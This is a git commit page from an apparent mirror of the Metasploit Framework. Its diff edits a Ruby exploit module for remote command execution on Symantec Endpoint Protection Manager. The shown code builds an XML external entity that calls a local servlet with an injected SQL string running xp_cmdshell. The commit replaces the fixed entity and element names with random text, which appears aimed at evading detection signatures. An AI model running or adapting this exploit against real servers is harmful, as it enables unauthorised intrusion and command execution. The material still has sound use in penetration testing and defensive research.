infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added randomness instead of payload and xxe keywords

bug/bundler_fix
xistence 2014-02-25 15:23:10 +07:00
parent 4908d80d6c
commit ab167baf56
1 changed files with 5 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
modules/exploits/windows/http/symantec_endpoint_manager_rce.rb
View File

@ -102,17 +102,19 @@ class Metasploit3 < Msf::Exploit::Remote
end
def soap_request(seqnum, command)
entity = "<!ENTITY payload SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"
randpayload = rand_text_alpha(8+rand(8))
randxxe = rand_text_alpha(8+rand(8))
entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"
xml = Document.new
xml.add(DocType.new('sepm', "[ METASPLOIT ]"))
xml.add_element("Request")
xxe = xml.root.add_element("xxe")
xxe = xml.root.add_element(randxxe)
xxe.text = "PAYLOAD"
xml_s = xml.to_s
xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding
xml_s.gsub!(/PAYLOAD/, "&payload;") # To avoid html encoding
xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding
xml_s
end